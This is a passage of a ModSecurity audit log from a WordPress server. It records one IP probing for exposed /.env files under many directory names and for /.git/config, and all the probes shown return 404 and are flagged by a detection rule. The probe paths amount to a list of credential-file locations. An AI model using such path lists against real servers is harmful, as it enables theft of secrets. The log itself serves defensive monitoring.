x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --9d623520-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=j9eegfv1pdkmqmqudaqvgcr1in; path=/ Set-Cookie: _sfs_id=f963c8c1d3914b2e70b845bdc68372421750110447; expires=Mon, 16 Jun 2025 22:47:27 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --9d623520-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.env.production"] [unique_id "aFCQ7grsPejRtmHkrKLPsAAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110446462838 1735618 (- - -) Stopwatch2: 1750110446462838 1735618; combined=1912, p1=370, p2=1439, p3=0, p4=0, p5=102, sr=102, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9d623520-Z-- --a7bfee41-A-- [17/Jun/2025:03:17:31.812302 +0530] aFCQ8ooVQnPDyHnl9oPCqgAAAAY 185.177.72.115 56978 127.0.0.1 7081 --a7bfee41-B-- GET /wp-content/.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a7bfee41-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=rp6gtrpjm0hurgcj873am5p16m; path=/ Set-Cookie: _sfs_id=699d60d76eb8cccfee4730125c8bc0ff1750110451; expires=Mon, 16 Jun 2025 22:47:31 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --a7bfee41-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/wp-content/.env"] [unique_id "aFCQ8ooVQnPDyHnl9oPCqgAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110450150636 1661739 (- - -) Stopwatch2: 1750110450150636 1661739; combined=1962, p1=394, p2=1456, p3=0, p4=0, p5=111, sr=107, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a7bfee41-Z-- --4b1e8121-A-- [17/Jun/2025:03:17:33.631616 +0530] aFCQ8xwcFb_n1P0IC9yEeQAAAAo 185.177.72.115 57042 127.0.0.1 7081 --4b1e8121-B-- GET /application/.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4b1e8121-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=plk8485n8lhq14bb9clod47v4p; path=/ Set-Cookie: _sfs_id=02beca133a9a41b77b1157e078fcf0481750110452; expires=Mon, 16 Jun 2025 22:47:32 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --4b1e8121-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/application/.env"] [unique_id "aFCQ8xwcFb_n1P0IC9yEeQAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110451926366 1705352 (- - -) Stopwatch2: 1750110451926366 1705352; combined=2219, p1=483, p2=1628, p3=0, p4=0, p5=107, sr=123, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4b1e8121-Z-- --123e1271-A-- [17/Jun/2025:03:17:35.467630 +0530] aFCQ9UcTB7P_sALtclAIewAAAAI 185.177.72.115 57106 127.0.0.1 7081 --123e1271-B-- GET /app/.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --123e1271-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=8uupqc2m3q6lgqnc65kpssu94m; path=/ Set-Cookie: _sfs_id=35fbdca2fb0d95a0cd284cdf16cc5a481750110454; expires=Mon, 16 Jun 2025 22:47:34 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --123e1271-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/app/.env"] [unique_id "aFCQ9UcTB7P_sALtclAIewAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110453749817 1717909 (- - -) Stopwatch2: 1750110453749817 1717909; combined=1770, p1=388, p2=1267, p3=0, p4=0, p5=114, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --123e1271-Z-- --6dc18925-A-- [17/Jun/2025:03:17:37.229087 +0530] aFCQ96RT9PYLci8mxb0c8gAAAAM 185.177.72.115 57166 127.0.0.1 7081 --6dc18925-B-- GET /config/.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6dc18925-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=f063e3j5c5vuioiqldi8es922e; path=/ Set-Cookie: _sfs_id=52d2e48bb4a03e97fad869599d1c07bd1750110456; expires=Mon, 16 Jun 2025 22:47:36 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --6dc18925-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/config/.env"] [unique_id "aFCQ96RT9PYLci8mxb0c8gAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110455581429 1647739 (- - -) Stopwatch2: 1750110455581429 1647739; combined=2032, p1=550, p2=1387, p3=0, p4=0, p5=95, sr=215, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6dc18925-Z-- --9af22049-A-- [17/Jun/2025:03:17:39.116132 +0530] aFCQ-VCTF37l_jAzt4oB2QAAAAU 185.177.72.115 57202 127.0.0.1 7081 --9af22049-B-- GET /api/.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --9af22049-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=hcdtl900sk383jhlq8vfpl1g0k; path=/ Set-Cookie: _sfs_id=73ae3615188012bdf5061ff485cf03101750110458; expires=Mon, 16 Jun 2025 22:47:38 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --9af22049-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/api/.env"] [unique_id "aFCQ-VCTF37l_jAzt4oB2QAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110457439614 1676593 (- - -) Stopwatch2: 1750110457439614 1676593; combined=1980, p1=434, p2=1430, p3=0, p4=0, p5=116, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9af22049-Z-- --82be9d56-A-- [17/Jun/2025:03:17:42.876644 +0530] aFCQ_QrsPejRtmHkrKLPtAAAAAE 185.177.72.115 36316 127.0.0.1 7081 --82be9d56-B-- GET /laravel/.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --82be9d56-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=75irdpkvh3bsa21fgcsj6p38p8; path=/ Set-Cookie: _sfs_id=cb459afe548c70df5949642ba5c87da51750110462; expires=Mon, 16 Jun 2025 22:47:42 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --82be9d56-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/laravel/.env"] [unique_id "aFCQ_QrsPejRtmHkrKLPtAAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110461188963 1687767 (- - -) Stopwatch2: 1750110461188963 1687767; combined=1645, p1=339, p2=1196, p3=0, p4=0, p5=109, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --82be9d56-Z-- --fd594535-A-- [17/Jun/2025:03:17:44.672801 +0530] aFCQ_hwcFb_n1P0IC9yEfAAAAAo 185.177.72.115 36356 127.0.0.1 7081 --fd594535-B-- GET /library/.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --fd594535-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=9hkckdtktbgdc7a4fap8ojm5pj; path=/ Set-Cookie: _sfs_id=462a44c8f809425f52005cfb10e21c721750110464; expires=Mon, 16 Jun 2025 22:47:44 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --fd594535-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/library/.env"] [unique_id "aFCQ_hwcFb_n1P0IC9yEfAAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110462998535 1674337 (- - -) Stopwatch2: 1750110462998535 1674337; combined=2143, p1=430, p2=1627, p3=0, p4=0, p5=85, sr=112, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fd594535-Z-- --3914d450-A-- [17/Jun/2025:03:17:46.440383 +0530] aFCRAFJfblPUQiSn5r2AxQAAAAA 185.177.72.115 36432 127.0.0.1 7081 --3914d450-B-- GET /nextjs-app/.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3914d450-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=us8tsas73qtgct3emqpcvrh6lr; path=/ Set-Cookie: _sfs_id=adea5bf6a3125a50c5fdff1f7905dffd1750110465; expires=Mon, 16 Jun 2025 22:47:45 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --3914d450-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/nextjs-app/.env"] [unique_id "aFCRAFJfblPUQiSn5r2AxQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110464786696 1653774 (- - -) Stopwatch2: 1750110464786696 1653774; combined=2160, p1=522, p2=1572, p3=0, p4=0, p5=66, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3914d450-Z-- --5e2e3f55-A-- [17/Jun/2025:03:17:48.251522 +0530] aFCRAqRT9PYLci8mxb0c9QAAAAM 185.177.72.115 36496 127.0.0.1 7081 --5e2e3f55-B-- GET /node-api/.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5e2e3f55-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=lof8bo4ssogdg3utsl7inmsqpv; path=/ Set-Cookie: _sfs_id=8d0d3aa5b5dfc04bd58ddf26e8fc6e0b1750110467; expires=Mon, 16 Jun 2025 22:47:47 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --5e2e3f55-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/node-api/.env"] [unique_id "aFCRAqRT9PYLci8mxb0c9QAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110466553658 1697947 (- - -) Stopwatch2: 1750110466553658 1697947; combined=2019, p1=429, p2=1490, p3=0, p4=0, p5=100, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5e2e3f55-Z-- --c006c223-A-- [17/Jun/2025:03:17:50.013792 +0530] aFCRBFCTF37l_jAzt4oB3AAAAAU 185.177.72.115 36546 127.0.0.1 7081 --c006c223-B-- GET /vendor/.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c006c223-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=947rk196m0fqmrajsh3p50kn36; path=/ Set-Cookie: _sfs_id=e305aec4e07a9dbb93a8b2aa2671abb91750110469; expires=Mon, 16 Jun 2025 22:47:49 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --c006c223-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/vendor/.env"] [unique_id "aFCRBFCTF37l_jAzt4oB3AAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110468365047 1648928 (- - -) Stopwatch2: 1750110468365047 1648928; combined=1809, p1=338, p2=1377, p3=0, p4=0, p5=93, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c006c223-Z-- --0f3a4b5e-A-- [17/Jun/2025:03:17:53.651272 +0530] aFCRB0cTB7P_sALtclAIgAAAAAI 185.177.72.115 36436 127.0.0.1 7081 --0f3a4b5e-B-- GET /.git/config HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0f3a4b5e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=gs4j8g1ptjjlg38ral7nnmcvo1; path=/ Set-Cookie: _sfs_id=c22956508a71d3e137d6718aaf47dff91750110472; expires=Mon, 16 Jun 2025 22:47:52 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --0f3a4b5e-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.git/config"] [unique_id "aFCRB0cTB7P_sALtclAIgAAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110471975264 1676109 (- - -) Stopwatch2: 1750110471975264 1676109; combined=1969, p1=361, p2=1485, p3=0, p4=0, p5=123, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0f3a4b5e-Z-- --cb61ea0c-A-- [17/Jun/2025:03:17:55.465320 +0530] aFCRCaRT9PYLci8mxb0c9wAAAAM 185.177.72.115 36502 127.0.0.1 7081 --cb61ea0c-B-- GET /backend/.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --cb61ea0c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=qctde6kn157prt8ieukcusd73g; path=/ Set-Cookie: _sfs_id=b70f5cc9409ffdd6c653127a2a2612f91750110474; expires=Mon, 16 Jun 2025 22:47:54 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --cb61ea0c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 